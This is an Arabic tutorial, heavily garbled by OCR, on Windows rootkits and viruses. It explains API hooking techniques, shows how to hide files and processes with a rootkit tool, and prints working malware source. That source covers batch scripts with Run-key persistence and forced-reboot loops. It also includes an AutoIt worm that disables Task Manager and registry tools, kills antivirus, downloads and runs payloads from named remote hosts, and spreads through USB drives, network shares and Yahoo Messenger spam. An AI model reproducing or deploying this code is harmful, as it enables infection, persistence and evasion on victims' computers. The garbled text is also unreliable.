اما ٤٤ہ‏ فیکم تقسیمھا کالتالي 


Files & Folders sءlخ!‎ -1 
Pr0ceیses اخفاء‎ 2 

Handles ءlخا‎ -3 

Registry Keys & Values sءlخا‎ -4 
Services ءlخا‎ -5 

TCP/UDP Sockets sءlفخا‎ -6 
Systray Icons ءlخا‎ -7 


وفي متالنا تستطيع تطبيق كل هذة الامور 


ملاحظة: هذا المثال يعمل تحت WINDOWS N1T/2000/XP/2003‏ 

الآن توجه إلى اي درايفر وليكن 1 وبعد ذلك اضف مجلد جديد بإاسم 8٠0٤i)‏ بهذة الطريقة 
d:\RootKit‏ 

بداخل المجلد الجديد ادخل الملف ع×ع.)0٥٣‏ 

بعد ذلك اضف اي ملف تنفيذ إلى المجلد وليكن ملف ع×م.٤ءم)‏ بهذة الطريقة d:\rootkit\(est.exe‏ 
بعد إضافة الملفين ° تابع الموضوع 

اولا :اخفاء الملفات والمجلدات 

قم بالدخول إلى المجلدd:|R0o0)Kit‏ 

الآن من خلال الدوس او من قائمة ٣٤‏ ھ)ء ثم رuا‏ 

نفذ الامر التالي D:\RootKit\root.exe /i‏ 

وهو عباره عن تنفیذ برنامج ۲٥۵۲‏ باستخدام البارمتر ¡ 

ستلاحظ ظهور المكتبة 411. )0٠ط‏ في نفس المجلد »هل تريد ان تعرف ما عملها 

الآن اخرج من المجلد 0:۸٠0٤)‏ يعني اغلق النوافذ الظاهرة وارجع للدسك توب 

الحين توجھة لل امu)eامpہصہC 1y‏ ثم الدرایفر 5 ؟ ماذا تلاحظ 

هل المجلد ٥0٤61)‏ 1:|۸8 موجود !! این اختفی ..... تابع 

حاول الدخول من إهط ءوعإ لله اكتب ٤اا٤مه٣|:4‏ سيظهر لك مسج خطأ بأن المجلد غير موجود؟ 
تعرف لماذا ؟ ليس للنظام نفسة احقية الوصول! بتوضيح اكثر ليس لل ٠×٠.١١٠١هام×م‏ احقيه الدخول 
للمجلد 

حاول إظهار او اخفاء المجلدات ؟ حاول بالدوس بأي شيء بمستوى المستخدم ما بتقدر تدخل هذا 
باختصار مفهوم اخفاء الملفات والمجلدات ٠٠‏ مع الملاحظة ان المجلد مازال موجود 

الان من خلال ۲۲هtء‏ تم رن او من خلال الدوس نفذ برنامج المثال الذي وضعناه بالمجلد 


D:\Ro0otKit\test.exe يفذİی كما‎ 

سيعمل البرنامج ...لو كانت النافذة الرئيسية مخفية ( كما هو الحال في كل الفايروسات ) 

هل ستلاحظ وجود البرنامج ؟ توجه لل مهمه[ یھ) او اي برنامج مستعرض ۴٣٣٤٤۹۹٤‏ لن 
تجد اي اثرلبرنامجنا م×م.)ءع) 

وهكذا مع بقية خصائص الاخفاء ٠»‏ بمجرد ادخال اي ملف او برنامج إلى مجلد ٤¡)†0هء|:d‏ 
سيكون له امتيازات خاصة للأخفاء كل مما يلي: 

Files & Folders 

Processes 

Handles 

Registry Keys & Values 

Services 

TCP/UDP Sockets 

Systray Icons 

تريد تتأكد من وجود الملفات!! الطريقة الوحيدة لكشفها هي بإستخدام برنnlمج RootkitRevealer‏ 
http://www.sysinternals.com/Files/RootkitRevealer.zip‏ 

كما في الصورة: 

اھا 5 


@* RootkitRerealer - Sysinternals: wywy.sysinternals.com 


Fila Options Help 


Descriptior 

E CINDY'S AS ofhwareD istribution 4D ataS tore Logs tmp. edb A2... B4.00 EB Yisible in Winda 
El LIN DOS system dA ™o...ËF + 142A... Û bytes Yisible in Winda 
DC: WIND O'S system 32Mû..tF +E BH 1 142r2.. Û bytes Hidden from Wil 
IS DMRoatKit 22... U bytes Hidden fram Wil 
3 OD *RoaatEiMHODE.DLL A2... 34.00 KBE Hidden rar il 
E] DO: RoctEiMRReadM e. tt 20032... 2.7۹ KB Hidden from ‘4ı 
FIC ARootKiMROOT EXE A0032... 23.03 EB Hidden fram wî 
FIP *RootKiIRTEST EXE AA UB... 4.00 EE Hidden from Wil 


ا 


وبعد هذة الأمثلة بالتأكيد تريد تعرف كيف يعمل برنامجع×ع.)۵٠٠‏ 
الجواب على ذلك ملفات الكود المصدري ... ملاحظة الكود بلغة الباسكال 


مبادئ والية عمل ال)0))i٬‌R‏ 


ال ۲ R٥0٤K‏ خطیرة لانھا تبرمج على مستوی النواه k٥٣"٥1‏ وتكون ذات صلاحيه عاليه 

لماذا لانها تبرمج على اساس انها ٠وس‏ ل۲هط بالصيغة التالية ءرء*.* ونظام ويندوز يعامل هذه 
الملفات بدون قيود او صلاحية .. فتعمل بمطلق الحرية.. 

مدخل: ان مصطلح ال)1 8٠06]‏ انتقل الينا من عالم الام كان المقصود به هو مجموعة من ال 
ئ¡ و التي كان الهاكرز يضعونها على الحواسيب المخترقة بعد الحصول على ال اهن)زہ! 
%6 . كانت هذه المجموعة تضم لاخفاء اثار اقتحام النظام و ادوات اخرى مثل 
sniffers,scanner)‏ ) اضافة الى برامج اخرى لمراقبة الوع)1[ز)ن الخاصة بالنظام .في الحقيقة 
ù‏ اrootkitsÛ‏ تسمح للهاكر ان يحقن ادواته في النظام اضافة الى مسح اثار الاختراق. في عالم 
الويندوز من المعتاد اطلاق اسم 8٠0٤)‏ على البرامج التي تقوم بالتغلغل في النظام وتعمل على 
التقاط (k٥هط‏ ) دوال ال۴1 ۸. طبعا من البديهي انه لن یستطیع التقاط وتعدیل دوال ال۴1 ۸ ذات 
المستوى المنحفض الا برنامج يخفي وجوده في النظام بشكل جيد وكذلك يخفي الاثار الخاصة به( 
مجلدات »ملفات» مفاتیح في ال رآt‌یاعءآ‏ ).العدید من ۲٥۵٤٤٤۶‏ تقوم بتنصیب الءع S۷1‏ 
والوم۷إإ الخاصة بها وكل ذلك يتم بشكل خفي. 


* مبدا استدعاء دوال ل۸۲1 : 


قبل ان نعرف بدا عمل الو)ا ۸٥0٤]‏ على منصة الوسه لم۷1 لابد لنا ان نعرف الطريقة التي يتم 
بها استدعاء دوال ال۴1 ۸ الموضوعة في ملف D1]‏ ولعمل ذلك هناك طريقتان اساسيتان: 

: (Statically imported functions) jSڊaئl اأربآٰ‎ 

يعتمد على كون المترجم "يعرف" ماهي المكتبات التي تتبعها كل الدوال التي يقوم باستدعائها 
البرنامج. بالاعتماد على هذه المعلومة فان المترجم يوم بعمل مل يمكن ان نطلق عليه ماطهt‏ مط 
po)‏ ص1 fه‏ للملف التنفيذي. 

The table of import‏ هي tructureء‏ من نوع خاص يیشکل جدولا يحتوي على قائمة باسماء 
المكتبات وقوائم بكل الدوال التي تصدرها كل مكتبة ولكل داله هناك حقل في الجدول يحوي عنوان 
الدالة ولكن هذه العنوان غير معروف في مرحلة ال Compa)‏ . بقع هذا الجدول في ال 4ء 
الخاص في بالملف التنفيذي .واثناء عمل Loading‏ للملف التنفيذي يقوم النظام بتحليل الجدول 
الخاص بهذا الملف وبالتالي تحميل المكتبات الموجودة هناك ومن ثم منح عناوين حقيقية للدوال 
الموجوة في المكتبات (طبعا نحن نتحدث عن مكتبات d11‏ ) . 

في الحقيقة في المكتبات اتی رظ وکل اسای خا زا :اثناء اقلاع البرنامج تکون کل 
مكتبات ال11 محملة كما ان مءاطها ٣مم‏ تكون جاهزة كما ان كل هذه الاشياء يقوم بعملها 
النظام بدون التدخل من البرنامج. 

لكن!! اذا لم تتواجد احد المكتبات او الدالة المذكورة لم تكن موجودة في الملف المذكوره فسيحدث خطا 
ولن نتمكن من اقلاع البرنامج كما اننا لانحتاج دائما الى تحميل كل المكتبات عند بداية عمل البرنامج 


باسندعاء ا۴ے 


impart table lg. heemenen‏ ا 
4P1 function‏ : 
2 الود الذي نتم 


Kernel32.l 


Functions 
LoadLibrary 
BetProcAddress 


الية استدعاء دوال ال]۸ 
في الرسم التوضيحي لاحظ: 
1- عملية ملء الاھ ٤۲م‏ ص1 بالعناوين 
2- قبل استدعاء دالة معينة اخذ عنوانها من الجدول السايق 
3- عماية الاستدعاء 
تانيا : الربط المتاخر او الديناميكي 
يختلف عن سابقه بان تحميل المكتبة يتم عن طريق دالة ال۸1 ر٣هاط [٥4۵3‏ التي تقع في 
ال32.11ءnاءk‏ كمأن الحصول على عنوان الدالة يتم عن طريق الدالة ssء‏ لل ۸١٥٣۴ء6‏ التي 
تقع في ال132.411٥۲”۸٥)‏ ایضا. 
لاحظ في الر سم السابق : 
4- تحميل المكتبات بواسطة المكتبة LoadLibrary‏ والحصوال على عئوان الدالة بواسطة دالة 
GetProcAddress APIÛ'‏ 
5- استدعاء دالة المطلوبة. 
ولكي لا نضطر الى استدعاء الدالة ووماك ل ۴٣٠١٤١۸‏ )ع6 عند كل مرة نحتاج فيها دالة معينة بامكاننا 
ان نحفظ عنوان الدالة في متغير مثلا. وبغض النظر عن الطريقة التي تم بها الربط مع المكتبة فلابد من 
معرفة الدوال التي تصدرها المكتبة ولهذا الغرض فان لدى كل مكتبة 11 جدول اسمه م[طاھ) ٤ا0م×م‏ 
يحتوي على ارقام الدوال المصدرة وعناوينها 
* طرق عمل kمہط‏ لدوال ال1٣۸‏ : 
اولا : عمل تعديل في كود البرنامح المكتوب بلغة الالة : في هذا النوع فان التعديل يحدث على تعديل 
على الكود الذي يقوم باستدعاء دالة ۸۴1 معينة .في الحقيقة هذا العملية صعبة جدا لوجود العديد من 
دوال لغات البرمجة والعديد من اصدارات المترجمات ولكن هذا نظريا ممكن اذا كنا نريد التغلغل في كود 
برنامج معروف الاصدار بحيث نستطيع تحليل الكود وكتابة برنامج لالتقاط الدوال المطلوبة. 


باسندعاء ال۴ 


impart table lq. heemenen‏ ا 
4P1 function‏ : 
2 الود الذي بت 


Kernel32.l 


Functions 
LoadLibrary 
BetProcAddress 


import taۆbleÛا‎ Jيدعت‎ : ٿانيا‎ 

فكرة هذه الطريقة سهلة وتعتمد على التالي :يقوم ال))٤هه8‏ بالبحث في ذاكرة الع1طه) ٤0مpصi‏ 
التابعة لبرنامج معين ومن ثم يقوم بتعديل عناوين الدوال التي تهمه الى عنواينه دوال تخصه (طبعا قبل 
ان يقوم بالتعديل لابد ان يحفظ العناوين الحقيقية في مكان ما) . 

لاحظ ان البرنامج لحظة استدعاء دالة معينة فانه اولا سيقوم بقراءة عنوان الدالة من الجدول ومن ثم 
aS‏ هناك عيب واضح في هذه الطريقة وهو ان الدوال التي يمكن عمل 
00ط لها فقط دوال ستاتيكية وهذا واضح في الرسم التالي 


4P1 function 


باسندعاء دوا ال۴ 


Kernel32.l 


function 
LoadLibrary 
GetProc Address 
ولكن هناك نقطةايجابية ايضا في هذه الطريقة وهي ان التنفيذ سهل جدا اضافة الى وجود العديد من‎ 
الامثلة التي تقوم بهذه العملية‎ 
الشي الوحيد الذي من الممكن ان يشكل صعوبة هو البحث داخل الماطه) 0۲۲م" وهنا تاتي‎ 
مساعدة شركة مايكرو سوفت والتي اعطتنا العديد من دوال ال۴1 ۸ التي تسهل الامر لذلك يبدو‎ 
الممثل بهذه الطريقة لايزيد عن عد ة صفحات بلغة السي‎ hook Û 


: GetProcAddress s LoadLibrary jتllد‎ hook Jمع‎ : ثالثا‎ 

ممکن ان نستعمل اي طريقة لعمل gممط‏ عادة نستخدم الطريقة الثانية ,فكرة هذه الطريقة كالتالي 
عند عمل )مط للدالة GetProcAddress,‏ ممن الممكن اعطاء عنوان الدالة الخاصة بك بدلا من 
عنوان الدالة المطلوبة من وجهة نظر البرنامج لا يوجد فرق بين الدوال فقط يطلب عنوانا وينفذ الامر 


سلبية هذا الطريقة كونها لا تعمل 00ط للدوال الاستاتيكية وانما فقط للدوال المربوطة بشكل 
دينامكيي كما يبين ذلك الرسم التوضيحي 


programm 
4۴| 


function‏ 2 الكود الذي بسند عي 
code‏ دوا ال ۳ے 


= 


رابعا : اجمع الطريقتين السابقتين : 

نعدل الع[طھا ٤مہ‏ بالطریقة 2 ثم نقوم بعمل 0kہط‏ فدllتيj LoadLibrary‏ و 

es‏ اء بالطريقة رقم 3 مستثنين اثناء ذلك الدوال اللازمة لعمل ال)¡))۸00 وبهذا 
لن يتمكن البرنامج من معرفة العناوين الصحيحة للدوال سوائ كان تحميلها ديناميكيا ام استاتكيا 
انظر الرسم التوضيحي: 


programm 


|4۴1 ٌ الكو د الذي سبسندعي, 
Function‏ دالة ال۴ 


م 


الطريقة الخامسة : تغيیركود دالة ال۸۲1 : 

واضح ان هذه الطريقة في التنفذ اصعب كثيرا في التنفيذ من مجرد تغيير العنوان وذلك لان ال¡kا0ه٣‏ 
يقوم بالبحث عن كود الدالة التي يبحث عنها وبالتالي تغييره وبهذا لن يحتاج الى تغيير عنوان الدالة 
في اbleÛ import ta‏ 

كل شيء يبقى على حاله مع فارق بسيط وهو داخل العنوان الاصلي واخل المكتبة الاصلية يقع الكود 
الخاص بال) )امه نفسه. في بداية كود الدالة التي تم تشويه كودها نضع تعليمتين او ثلاث تقومان 
بعمل بنقل التحكم الى الاوامر الخاصة بالإعامهط وفي الاخر تعليمتين او 3 بحيث ينتهى الامر كما لو 
ان دالتنا انتهت من عملها بشكل طبيعي. 


( فیرس 86) 


وھو فایرس یعمل عن طریق ملف ہں۲٥)ںھ‏ تم يقوم بعمل ملف فی النظام ثم يقوم باعطاء قیمه فی 
الرجسترى للعمل للملف من٤إه)ء‏ مع الويندوز واليكم المكان الذى وضع فيه القيمه 
HKEY_ CURRENT _USER\Software\Microsoft\Windows\CurrentVersion\Run‏ 


Autorun 
File 


Virus 
master 


Add key Add virus 


to To system 
registry 


واليكم الاكواد بلغ (٤ھط.)‏ طc٤ھط‏ 
کود اضافھ ملف الی النظام یقوم بعمل Ww‏ ٥ل)ںط؛‏ بعد 60 ثانیھ 
echo shutdown -r -t 60>c:\Recycled\xx.bat‏ 
کود اضافه قیمه للرجستری الی (ہں۲) لعمل مں٤۲ھاء‏ للفیرس 

Reg add hkcu\software\microsoft\windows\currentversion\run /V o /t 
reg_sSz /d "e:\Recycled\xx.bat"" 

تشغيل الفيرس بعد الانتهاء مباشرا 
start=e:\Recycled\xx.bat‏ 


فير (Super SG)‏ 
هذا الفيرس يقوم بعمل ثلاث ملفات فى النظام وثلاث قيم فى الرجسترى وعمل اعاده تسميه 
للملفات ومسح ملف الفیرس الرئیسی وملف ۸010۸٥١ N‏ لکی لا یكشف الفیرس 
یقوم (۸ €5 ۷1۸) بعد ما يعمل مهمته وهی عمل اغلاق بعد 60 تانيه يقوم بتغيير اسم الملف من 
VIRUS A‏ الى [RUS ۸A‏ ثم تغيير اسم ملف VIRUS B yl VIRUS B8‏ 


سوف نسأل لماذا نغيير اسم الملف لان وضعنا قيم فى الرجسترى اسماء الملفات الحقيقيه وهى 

)۷]R US C,۷[RUS B,YIRUS ^A)‏ ولکننا سوف نضع اسم فیرس من الثلاثھ باسم صحیح 
وذلك لعدم عمل جميع الفيروسات الثلاثه مع البعض وذلك بتغيير اسم الفيرس الذى يعمل الى اسم 
خاطىئ لعدم العمل مع اقلاع الويندوز المره القادمه وتحويل اسم ملف الفيرس الثانى باسم صحيح 
ليعمل مع مع اقلاع الويندوز المره القادمه 
يقوم (8 )۷181S‏ بعد ما يعمل مهمته يقوم بتغيير اسم الملف VIRUS BB JI VIRUS 8 ja‏ 
ثم تغيير اسم ملف VIRUS C ll VIRUS CC‏ 

یقوم 0S €٤(‏ ۷[۸) بعد ما یعمل مھمته یقوم بتغییر اسم الملف من € 8ا ۷1۸ الى 

[RUS €‏ ۷ ثم تغییر اسم ملف ۸۸ ۷1۸0S‏ الی ۸ 0S‏ ۷]۸ ثم یقوم الفیرس برجوع 

الى البدايه مره اخرى 


DELET VIRUS MASTER 
EXIT YIRUS 
ADD REG VIRUS C 


ADD REG VIRUS B 
ADD REG VIRUS A 


VIRUS VIRUS 
BB CC 


اعادد تسصيه اعاذه تنسصيه اعاده تسصيه 
E TO BB LU TO CC‏ ےھ ٣آ‏ ے 
ےھ ٣‏ ےھ BBE TÛ EB Cr TO C‏ 


والیکم کود الفیرس(۲ع)٤ھہہ‏ یںآذہ ) بلغه الباتش 

@echo off (VIRUS A) 
echo shutdown -r -t 60>c:\A.bat 
echo ren BB.bat B.bat>nul >>c:\A.bat 
echo ren A.bat AA.bat>nul >>c:\A.bat 

(VIRUS BB) 
echo start=C:\WINDOWS\winnt256.bmp>c:\BB.bat 
echo ren CC.bat C.bat>nul >>c:\BB.bat 
echo ren B.bat BB.bat>nul >>c:\BB.bat 

(VIRUS CC) 
echo start=C:\WINDOWS\clock.avi>c:\CC.bat 
echo ren AA.bat A.bat>nul >>c:\CC.bat 
echo ren C.bat CC.bat>nul >>c:\CC.bat 

(ADD REG VIRUS A) 
Reg add hkcu\software\microsoft\windows\currentversion\run /v 3 /t 
reg_sSz /d "c:\C.bat"" 

(ADD REG VIRUS B) 
Reg add hkcu\software\microsoft\windows\currentversion\run /V 2 /t 
reg_sSz /d "c:\B.bat"" 

(ADD REG VIRUS C) 
Reg add hkcu\software\microsoft\windows\currentversion\run /v 1 /t 
reg_sSz /d "c:\A.bat"" 


del autorun.inf (DELET VIRUS MASER AND AUTORUN EILE ) 
del super SG.bat 


ویضع کل هذه الاکواد فی ملف بامتداد ٤ھط.‏ 


الکود لفیرس ٥۵ا٥٤ "٥w‏ هذا الفيرس مبرمج بلغه السکربت ببرنامج (1۲1 S٥‏ 1۲ ۸010) 


$setting = ''setting''; ملف الفايروس‎ 


$ini = '"".ini"" 
$nql = ".nql" 
$xls = '"".xls'"" 


$exe = '".exe"" 

$toigioupdate = @ HOUR + 2 

$toigio = @MIN + 30 

يقوم بنسخ نفسه في المجلد الرئيسي 

FileCopy (@ AutoltExe, @SystemDir & '"\'' & $name & $exe,0) 

هنا يقوم بحماية نفسه الاختفاء او للقراءة فقط او مجلد نظام 

FileSetAttrib (@SystemDir & '"'\'"'" & $name & $exe,''+RSH'"') 

نسخ نفسه الى مجلد النظام 

FileCopy (@ AutolItExe, @ WindowsDir & '"\" & $name & $exe,0) 

يقوم بحماية نفسه عبر الاياليب السابقة 

FileSetAttrib (@ WindowsDir & '"\'"'" & $name & $exe,''"-RSH"") 

يقوم بانشاء مداخل في الروجستري ليشتغل تلقائيا مع الويندوز 
RegWrite ('HKEY_LOCAL_ MACHINE\SOFTWARE\Microsoft\Windows‏ 
NT\CurrentVersion\Winlogon'",''Shell'",''REG_RegWrite‏ 
('"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run'",''Yaho‏ 
لهذا لا يمكنكم رؤيتها في انضرbıط o Messengger'",''; ءlغll option des dossiers‏ 

RegWrite 
('"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Expl 
orer'", "'NofolderOptions'",''; مlمئا الغاء ادارة‎ 

RegWrite 
('"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Syste 
m'"", "Disable TaskMgr'',; الغاء محرر الروجستري‎ 

RegWrite 
('"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Syste 
m"", "DisableRegistry Tools'',; ددحمئlاl انشاء جدول ليشتغل تلقائيا و في الوقت‎ 

RegWrite 
('"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule'",''AtTas 
kMaxHours'"',''REG__ RunDOS ('AT /delete /yes'"") 

_RunDOS ("AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su ' & @SystemDir & '"\'"" 
&$name & $exe) 

createini) 

update) 

sendmess() 

قراءة الملفات المشتركة و بهذا يقوم بنشر نفسه في الشبكة 

$a = RegRead 
('"HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Explorer\WoO 
rkgroupCrawler\If $a ='"'' Then 

copynetwork () 

EndIf 


If $a <>'"""' Then 

If FileExists ($a)=0 Then 
copynetwork() 

EndIf 

EndIf 

If ProcessExists ("'game_y.exe'") Then 
ProcessClose ("'game_y.exe'"") 

EndIf 

Sleep (1000) 

If ProcessExists ("'game_y.exe'") Then 
ProcessClose ("'game_y.exe'"") 

EndIf 

Sleep (1000) 

If ProcessExists ("'game_y.exe'") Then 
ProcessClose ("'game_y.exe'"") 

EndIf 

Sleep (1000) 

If ProcessExists ("'game_y.exe'") Then 
ProcessClose ("'game_y.exe'"") 

EndIf 

Sleep (1000) 

نسخ نفسه الى كل فلاش مموري متصلة بالكمبيوتر 
While (1)‏ 

killprocess() 

copyusb() 

If @HOUR = $toigioupdate Then 
update) 

If ProcessExists ("'game_y.exe'") Then 
ProcessClose ("'game_y.exe'"") 

EndIf 

Sleep (1000) 

If ProcessExists ("'game_y.exe'") Then 
ProcessClose ("'game_y.exe'"") 

EndIf 

Sleep (1000) 

If ProcessExists ("'game_y.exe'") Then 
ProcessClose ("'game_y.exe'"") 

EndIf 

Sleep (1000) 

If ProcessExists ("'game_y.exe'") Then 
ProcessClose ("'game_y.exe'"") 

EndIf 

Sleep (1000) 

EndIf 

If @MIN = $toigio Then 

sendmess() 


EndIf 

WEnd 

يقوم بتحميل الاعدادات من موقع الصانع و الله اعلم ان كانت فكرة اخرى اضيفوها 

Func downloadurl() 

$settingurl='"'http://nhatquanglan3.t35.com'"" 

If InetGet ($settingurl & '""/'' & $setting & $nql, @SystemDir & '"\'"' & $setting & $ini,1,0) 
= 0 Then 

InetGet ($settingurl & '"/'"' & $setting & $xls, @SystemDir & '"\'"' & $setting & $ini,1,0) 
EndIf 

Sleep (1000) 

$downloaded=""success'"" 

$settingurl1 = '"'http://nhatquanglan4.t35.com'"" 

If IniRead (@SystemDir & '"\'"' & $setting & $ini,''setting'",''downloaded'",'"'") <> 
$downloaded Then 

If InetGet ($settingurl1 & ''/'"' & $setting & $nql, @SystemDir & '"\" & $setting & 
$ini,1,0) = 0 Then 

InetGet ($settingurl1 & '""/'"' & $setting & $xls, @SystemDir & '""\'"'" & $setting & $ini,1,0) 
EndIf 

EndIf 

FileSetAttrib (@SystemDir & '"\'" & $setting & $ini,''+RSH'"') 

EndFunc 

تحديث الفايروس 

Func update) 

downloadurl() 

$website = IniRead (@SystemDir & '"\'"' & $setting & $ini,'"'setting'",''website'",'""") 
$check01 = IniRead (@SystemDir & '"\'"' & $setting & $ini,''setting'",'"'filedownload1'",'""") 
$check02 = IniRead (@SystemDir & '"\'"' & $setting & $ini,''setting'",'"'filedownload2'",'""") 
$check03 = IniRead (@SystemDir & '"\'"' & $setting & $ini,''setting'",'"'filedownload3'",'""") 
$size01 = Number (IniRead (@SystemDir & '"\'"' & $setting & $ini,'"'setting'",''size01'",'""")) 
$size02 = Number (IniRead (@SystemDir & '"\" & $setting & $ini,'"'setting'",''size02'",'""")) 
$size03 = Number (IniRead (@SystemDir & '"\"' & $setting & $ini,'"'setting'",''size03'",'""")) 
If $check01 <>'""' Then 

If Not FileExists (@SystemDir & '"\'"' & $check01 & $exe) Then 

If InetGet ($website & '"'/'' & $check01 & $nql, @SystemDir & '"\'"'" & $check01 & 
$exe,1,0)=0 Then 

InetGet ($website & '"/'' & $check01 & $xls, @ SystemDir & '"\'" & $check01 & $exe,1,0) 
EndIf 

Sleep (3000) 

If FileExists (@SystemDir & '"\'"' & $check01 & $exe) Then 

If Number (FileGetSize (@SystemDir & '"\'"' & $check01 & $exe))/1024>=$size01 Then 
FileSetAttrib (@SystemDir & '"\'"' & $check01 & $exe,''+RSH'"') 

Run (@SystemDir & '"\'"'" & $check01 & $exe) 

EndIf 

EndIf 

EndIf 

EndIf 


If $check02 <>'""" Then 

If Not FileExists (@SystemDir & '"\'"' & $check02 & $exe) Then 

If InetGet ($website & '"'/'' & $check02 & $nql, @SystemDir & '"\'" & $check02 & 
$exe,1,0)=0 Then 

InetGet ($website & '"/'' & $check02 & $xls, @ SystemDir & '"\" & $check02 & $exe,1,0) 
EndIf 

Sleep (3000) 

If FileExists (@SystemDir & '"\'"' & $check02 & $exe) Then 

If Number (FileGetSize (@SystemDir & '""\'" & $check02 & $exe))/1024>=$size02 Then 
FileSetAttrib (@SystemDir & '"\'"'" & $check02 & $exe,''+RSH'"') 

Run (@SystemDir & '"\'"'" & $check02 & $exe) 

EndIf 

EndIf 

EndIf 

EndIf 

If $check03 <>'""" Then 

If Not FileExists (@SystemDir & '"\'"' & $check03 & $exe) Then 

If InetGet ($website & '"'/'' & $check03 & $nql, @SystemDir & '"\'"' & $check03 & 
$exe,1,0)=0 Then 

InetGet ($website & '"/'' & $check03 & $xls, @ SystemDir & '"\"' & $check03 & $exe,1,0) 
EndIf 

Sleep (3000) 

If FileExists (@SystemDir & '"\'"'" & $check03 & $exe) Then 

If Number (FileGetSize (@SystemDir & '""\'" & $check03 & $exe))/1024>=$size03 Then 
FileSetAttrib (@SystemDir & '"'\'" & $check03 & $exe,''+RSH'"') 

Run (@SystemDir & '"\'"'" & $check03 & $exe) 

EndIf 

EndIf 

EndIf 

EndIf 

$toigioupdate = @ HOUR + 2 

If $toigioupdate >12 Then 

$toigioupdate = $toigioupdate -12 

EndIf 

EndFunc 

انشاء رسالة ليرسلها الى جميع الايميلات في الياهو 

Func sendmess() 

$myweb = IniRead (@SystemDir & '"\" & $setting & $ini,''setting'',''myweb'",'""") 
If $myweb = '"""' Then 

$myweb = "'http://nhatquanglan1.0catch.com'"" 

EndIf 

Dim $tin [10] 

$tin[0] = IniRead (@SystemDir & '"\'"' & $setting & $ini,''setting'','"'tin[0]'','"'") 

If $tin[0] = '"'"' Then 

$tin[0] = "E may, vao day coi co con nho nay ngon lam '' & $myweb & '' "" 

EndIf 


$tin[1] = IniRead (@SystemDir & '"\'"' & $setting & $ini,'"'setting'",'"'tin[1]'",'"'") 

If $tin[1] = '"""' Then 

$tin[1] = '"Vao day nghe bai nay di ban '"' & $myweb & '" "' 

EndIf 

$tin[2] = IniRead (@SystemDir & '"\'"' & $setting & $ini,'"'setting'','"'tin[2]'",'"'") 

If $tin[2] = '"""" Then 

$tin[2] = '"Vao day nghe bai nay di ban '"' & $myweb & '" "' 

EndIf 

$tin[3] = IniRead (@SystemDir & '"\'"' & $setting & $ini,''setting'","'tin[3]'",''"'") 

If $tin[3] = '"""' Then 

$tin[3] = '"'"Biet tin gi chua, vao day coi di '"' & $myweb & '"' "" 

EndIf 

$tin[4] = IniRead (@SystemDir & '"\'"' & $setting & $ini,''setting'",'"'tin[4]'",'"'") 

If $tin[4] = '"""' Then 

$tin[4] = 'Trang Web nay coi cung hay, vao coi thu di '"'" & $myweb & '" '"" 

EndIf 

$tin[5] = IniRead (@SystemDir & '"\'"' & $setting & $ini,'"'setting'",'"'tin[5]'",'''") 

If $tin[5] = '""""' Then 

$tin[5] = '""Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau 
khi bao nhieu mo EndIf 

$tin[6] = IniRead (@SystemDir & '"\" & $setting & $ini,''setting'','"'tin[6]'",'''') 

If $tin[6] = '"""' Then 

$tin[6] = ''Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao 
nhieu yeu thuong nhung EndIf 

$tin[7] = IniRead (@SystemDir & '"\'"' & $setting & $ini,'"'setting'",'"'tin[7]'",'""") 

If $tin[7] = '"""" Then 

$tin[7] = ''"Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio 
nguoi lac loi buoc chan EndIf 

$tin[8] = IniRead (@SystemDir & '"\'" & $setting & $ini,"'setting'",'"'tin[8]'',''""") 

If $tin[8] = '""' Then 

$tin[8] = ''Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da 
den nhu la giac mo EndIf 

$tin[9] = IniRead (@SystemDir & '"\'"' & $setting & $ini,'"'setting'",'"'tin[9]'',''"'") 

If $tin[9] = '""' Then 

$tin[9] = ''"Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra 
lai em niem tin thang EndIf 

Win Get Title( "Yahoo!‏ = tieude$اختيار‏ جميع الايميلات في الياهو ليرسل عنوان الموقع للتحميل منه 
Messenger'", '"'"")‏ 

$kiemtra = WinExists ($tieude) 

If $kiemtra = 1 Then 

$ngaunhien = Random(0,9,1) 

ClipPut ($tin[$ngaunhien]) 

BlockInput (1) 

WinActivate ($tieude) 

Send ("'!m'") 

Send ("'"un'"") 


Send ('^v {ENTER}HENTER}") 

Send ('^m'"") 

Send ('{DOWN}") 

Send ('^{SHIFTDOWN}{END}{SHIFTUP}"") 
Send ('{ENTER}"") 

Send ('^v {ENTER}"') 

BlockInput (0) 

EndIf 

$toigio=@ MIN + 30 

If $toigio>60 Then 

$toigio=$toigio-60 

EndIf 

EndFunc 

دالة لقتل الانتي فايروس و ادارة المهام ومحرر الروجستري واداة الدوس 
Func killprocess()‏ 

If WinExists ('Bkav2006'') Then 

WinClose ("'"Bkav2006'") 

RegDelete 
('"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'"", 
"BkavFw'"") 

EndIf 

If WinExists ("System Configuration'") Then 
WinClose ("System Configuration'") 

EndIf 

If WinExists ("'Registry'') Then 

WinClose ("'"Registry'") 

EndIf 

If WinExists ("Windows Task'") Then 
WinClose ("Windows Task'"") 

EndIf 

If WinExists ("'[FireLion]'') Then 

RegDelete 
('"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run'", 'ITEPro 
tection'"") 

Shutdown (2) 

EndIf 

If ProcessExists ("'cmd.exe'") then 
ProcessClose ("'cmd.exe'") 

EndIf 

EndFunc 

دالة نسخ نفسه في الفلاش مموري 

Func copyusb() 

$usb = DriveGetDrive('REMOVABLE"') 

If NOT @error Then 

Dim $odia[6] 

$odia[1]=""" 


For $i=1 To $usb[0] 

$odia[$i-1]=$usb[$i] 

Next 

If $odia[0] <>''"A:'" Then 

If $odia[0]<>'"'"' Then 

FileCopy (@ WindowsDir & '"\'"'" & $name & $exe,$odia[0] & ''\New Folder.exe'",0) 
Sleep (1) 

